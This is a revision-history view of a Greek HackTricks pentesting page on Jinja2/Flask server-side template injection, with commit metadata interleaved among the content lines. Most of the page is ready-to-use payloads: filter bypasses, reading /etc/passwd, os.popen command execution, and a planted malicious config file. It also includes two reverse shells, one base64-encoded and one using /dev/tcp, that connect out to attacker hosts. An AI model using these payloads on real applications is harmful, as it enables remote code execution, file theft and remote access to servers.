										
										
											2022-07-20 01:03:41 +00:00
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								Αυτές οι παρακάμψεις θα μας επιτρέψουν να **έχουμε πρόσβαση** στα **χαρακτηριστικά** των αντικειμένων **χωρίς να χρησιμοποιούμε ορισμένους χαρακτήρες**.\
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Έχουμε ήδη δει μερικές από αυτές τις παρακάμψεις στα παραδείγματα του προηγούμενου, αλλά ας τις περιλάβουμε εδώ:
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```bash
 								# Without quotes, _, [, ]
 								## Basic ones
 								request.__class__
 								request["__class__"]
 								request['\x5f\x5fclass\x5f\x5f']
 								request|attr("__class__")
 								request|attr(["_"*2, "class", "_"*2]|join) # Join trick
 								## Using request object options
 								request|attr(request.headers.c) #Send a header like "c: __class__" (any trick using get params can be used with headers also)
 								request|attr(request.args.c) #Send a param like "?c=__class__
 								request|attr(request.query_string[2:16].decode() #Send a param like "?c=__class__
 								request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join) # Join list to string
 								http://localhost:5000/?c={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ #Formatting the string from get params
 								## Lists without "[" and "]"
 								http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
 								# Using with
-												GitBook: [#3475] No subject

											
										
										
											2022-09-09 11:57:02 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								{% raw %}
 								{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
 								{% endraw %}
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								* [**Επιστρέψτε εδώ για περισσότερες επιλογές πρόσβασης σε ένα παγκόσμιο αντικείμενο**](jinja2-ssti.md#accessing-global-objects)
 								* [**Επιστρέψτε εδώ για περισσότερες επιλογές πρόσβασης στην κλάση αντικειμένου**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
 								* [**Διαβάστε αυτό για να λάβετε RCE χωρίς την κλάση αντικειμένου**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								**Αποφυγή κωδικοποίησης HTML**
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Από προεπιλογή, το Flask κωδικοποιεί HTML όλα τα μέσα σε ένα πρότυπο για λόγους ασφαλείας:
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```python
 								{{'<script>alert(1);</script>'}}
 								#will be
 								&lt;script&gt;alert(1);&lt;/script&gt;
 								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								**Το φίλτρο `safe`** μας επιτρέπει να ενσωματώσουμε κώδικα JavaScript και HTML στη σελίδα **χωρίς** να γίνει **κωδικοποίηση HTML**, όπως εδώ:
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```python
 								{{'<script>alert(1);</script>'|safe}}
 								#will be
 								<script>alert(1);</script>
 								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								**RCE με τη συγγραφή ενός κακόβουλου αρχείου ρύθμισης.**
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```python
 								# evil config
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								{{ ''.__class__.__mro__[1].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
 								# load the evil config
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
 								# connect to evil host
 								{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
 								```
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								## Χωρίς αρκετούς χαρακτήρες
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								Χωρίς **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`**
-												GITBOOK-3792: No subject

											
										
										
											2023-02-23 14:32:10 +00:00
+								```python
 								{% raw %}
 								{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
 								{% endraw %}
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
-												GITBOOK-3792: No subject

											
										
										
											2023-02-23 14:32:10 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								## Jinja Ενσωμάτωση χωρίς **\<class 'object'>**
-												GITBOOK-3792: No subject

											
										
										
											2023-02-23 14:32:10 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Από τα [**παγκόσμια αντικείμενα**](jinja2-ssti.md#accessing-global-objects) υπάρχει άλλος τρόπος να φτάσετε σε **RCE χωρίς να χρησιμοποιήσετε αυτή την κλάση.**\
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								Αν καταφέρετε να φτάσετε σε οποιαδήποτε **συνάρτηση** από αυτά τα παγκόσμια αντικείμενα, θα μπορείτε να έχετε πρόσβαση στο **`__globals__.__builtins__`** και από εκεί το **RCE** είναι πολύ **απλό**.
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								Μπορείτε να **βρείτε συναρτήσεις** από τα αντικείμενα **`request`**, **`config`** και οποιοδήποτε **άλλο** ενδιαφέρον **παγκόσμιο αντικείμενο** στο οποίο έχετε πρόσβαση με:
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```bash
 								{{ request.__class__.__dict__ }}
 								- application
 								- _load_form_data
 								- on_json_loading_failed
 								{{ config.__class__.__dict__ }}
 								- __init__
 								- from_envvar
 								- from_pyfile
 								- from_object
 								- from_file
 								- from_json
 								- from_mapping
 								- get_namespace
 								- __repr__
 								# You can iterate through children objects to find more
 								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Αφού βρείτε μερικές λειτουργίες, μπορείτε να ανακτήσετε τα builtins με:
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```python
 								# Read file
 								{{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }}
 								# RCE
 								{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("ls").read() }}
 								{{ config.__class__.from_envvar["__globals__"]["__builtins__"]["__import__"]("os").popen("ls").read() }}
 								{{ (config|attr("__class__")).from_envvar["__globals__"]["__builtins__"]["__import__"]("os").popen("ls").read() }}
-												GitBook: [#3475] No subject

											
										
										
											2022-09-09 11:57:02 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								{% raw %}
 								{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("ls")["read"]() %} {{ a }} {% endwith %}
 								{% endraw %}
 								## Extra
 								## The global from config have a access to a function called import_string
 								## with this function you don't need to access the builtins
 								{{ config.__class__.from_envvar.__globals__.import_string("os").popen("ls").read() }}
 								# All the bypasses seen in the previous sections are also valid
 								```
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								## Αναφορές
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
 								* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								* Ελέγξτε το [κόλπο attr για να παρακάμψετε μαύρες λέξεις σε αυτό το σημείο](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								* [https://twitter.com/SecGus/status/1198976764351066113](https://twitter.com/SecGus/status/1198976764351066113)
 								* [https://hackmd.io/@Chivato/HyWsJ31dI](https://hackmd.io/@Chivato/HyWsJ31dI)
 								<details>
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Άλλοι τρόποι υποστήριξης του HackTricks:
-												arte

											
										
										
											2024-01-01 17:15:42 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								* Ανακαλύψτε [**Την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 								* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
 								</details>